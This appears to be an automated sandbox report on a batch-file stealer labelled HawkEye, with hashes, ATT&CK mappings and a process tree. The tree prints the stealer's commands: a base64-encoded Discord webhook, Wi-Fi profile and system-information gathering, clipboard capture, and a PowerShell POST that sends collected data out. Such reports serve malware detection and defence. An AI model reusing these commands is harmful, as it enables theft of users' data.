hawkeye | 63f1a99e5ad0aa15bc12bfe7b20d1e9a9df3752b61ec9dbb0d1bb62fc8cfe6c4

General

Target

ultimate_stealer.bat
Size

1KB
MD5

8b98f150c51dd4d1131853ce39e0404a
SHA1

bc017b390021d8ad234bedfbb081fc0a3614c081
SHA256

63f1a99e5ad0aa15bc12bfe7b20d1e9a9df3752b61ec9dbb0d1bb62fc8cfe6c4
SHA512

a6768852c9501eaf8cd9b81dc35f863757e66d5fb532c8265f7d3ca2239c4f1fe0565ab9f37793af17fdbca642861cb986d4ac260ecb632834047b0cce8e750c

Score

10^/10

hawkeye collection discovery execution keylogger persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Hawkeye family
hawkeye

Clipboard Data 1 TTPs 1 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2016	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4380	powershell.exe
3116	powershell.exe
1248	powershell.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1920	netsh.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3728	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1248	powershell.exe
1248	powershell.exe
2016	powershell.exe
2016	powershell.exe
3116	powershell.exe
3116	powershell.exe
4380	powershell.exe
4380	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3116	powershell.exe
3116	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4488 wrote to memory of 1248	4488	cmd.exe	83
PID 4488 wrote to memory of 1248	4488	cmd.exe	83
PID 4488 wrote to memory of 3728	4488	cmd.exe	84
PID 4488 wrote to memory of 3728	4488	cmd.exe	84
PID 4488 wrote to memory of 1920	4488	cmd.exe	87
PID 4488 wrote to memory of 1920	4488	cmd.exe	87
PID 4488 wrote to memory of 2932	4488	cmd.exe	88
PID 4488 wrote to memory of 2932	4488	cmd.exe	88
PID 2932 wrote to memory of 2636	2932	cmd.exe	89
PID 2932 wrote to memory of 2636	2932	cmd.exe	89
PID 4488 wrote to memory of 2016	4488	cmd.exe	90
PID 4488 wrote to memory of 2016	4488	cmd.exe	90
PID 4488 wrote to memory of 3116	4488	cmd.exe	91
PID 4488 wrote to memory of 3116	4488	cmd.exe	91
PID 4488 wrote to memory of 4380	4488	cmd.exe	92
PID 4488 wrote to memory of 4380	4488	cmd.exe	92

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ultimate_stealer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMxNTMzNTExODk0MDAxNjY0MC9TenlPRnVBcm15WUlPWk9vTkR5X0MzVHpSZlNvVXgzemFzQXN0UFdsNlE3OEs1U082aHprYnF4VFlQelI1a25ia2ozVA==')) > webhook.txt"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:3728
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c findstr /C:"All User Profile" wifi_profiles.txt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Windows\system32\findstr.exe
    findstr /C:"All User Profile" wifi_profiles.txt
    3⤵
    PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Get-Clipboard
  2⤵
  - Clipboard Data
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait('{PRTSC}')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$File = 'data.txt'; $uri = ' ■h'; $body = @{content=(Get-Content -Path $File -Raw)}; Invoke-RestMethod -Uri $uri -Method Post -Body $body"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Privilege Escalation

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Wi-Fi Discovery

1

T1016.002

Lateral Movement

Collection

Clipboard Data

1

T1115

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
20eabef756751459771c47e76ba4af9d

SHA1
d046d6d3912c6cd10e4b072d4a5aee81ff59c9e6

SHA256
547c97c19bddd40e3e8b249a34e45a2edd916112ca7b42a37172a88c0719a3c1

SHA512
75ef6b02016fc454b4e06e997146a300cda50ab99551fa009864adda91918da7fa2f9c0be44dbd3666f1fe34e05598e8e5388db85815cdbd47fdd3764baaa67d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
224dcf4c17389871fa59fe45c7acd94a

SHA1
d02998277a18745bc5a5209d80a4d5c5077772ff

SHA256
c10c307786cba93488fb258b288490207e01024028a4340eab17f0c0b23dbb0e

SHA512
8e30a4a06f9a06dd2556ee9125e9dc9effcc1cbb3ce6ff9fabee383db8e4fdbe7f638ea71d5a42d6722748543c8f2a4399baefdd2a2cc20e531c966b29f32e10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkfzhccv.knw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\data.txt

Filesize
2KB

MD5
b6435154200ed7d494f18d720bf3bde8

SHA1
99aa8d49ac23d8747543d85b8fe19db740f08060

SHA256
c4351c266e3c8e0838a1fd08e4d70551d5dac04049d1e904f595d7de87006e2d

SHA512
97d5d358173884570e733b2640861470fb1f6717c32ef6b45f1bc791ea134cc1790c543c2f764b7c5b54f1ea4a2f9f4cd67efc747b7fda4a30326e108cda7df5

Download Submit
C:\Users\Admin\AppData\Local\Temp\webhook.txt

Filesize
248B

MD5
62660daa7eda586bd806a7ff553ee095

SHA1
d90d11b252c9637b7a3d6d04a968f9c7a1a34c50

SHA256
ebf5116a4ee0ed7d86dd2523d6063f6ed3b49841432781b940e8db31c7a8694c

SHA512
e2a2e77b2b66e5f9200da9ea4db3dfa65c9a8c0724b8c7d9bf1132c18690ba9a8e3e5278a597a3ebc1844c8cd6a1c42e82d4e56b6267f3a639dacf67965b18e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\wifi_profiles.txt

Filesize
59B

MD5
409930721dbce1ee58227d109cca4570

SHA1
767f86ffec769d8415f07b4372a108cba1bf7221

SHA256
6b6dd8b11f84fb78e3e8cfaa7c5fca569d79402b9fc5861b00960b25607c911e

SHA512
4875187fce9545a92df636e384f92dcb403dfe80f3cad4a68e79329a1f42e12e9d04948f2a52b939638481da6d3e3b5f5096fe6dfd674ee53cca7c655ec03f17

Download Submit
memory/1248-0-0x00007FFD22063000-0x00007FFD22065000-memory.dmp

Filesize
8KB

Download
memory/1248-16-0x00007FFD22060000-0x00007FFD22B21000-memory.dmp

Filesize
10.8MB

Download
memory/1248-12-0x00007FFD22060000-0x00007FFD22B21000-memory.dmp

Filesize
10.8MB

Download
memory/1248-11-0x00007FFD22060000-0x00007FFD22B21000-memory.dmp

Filesize
10.8MB

Download
memory/1248-1-0x00000196B9F30000-0x00000196B9F52000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads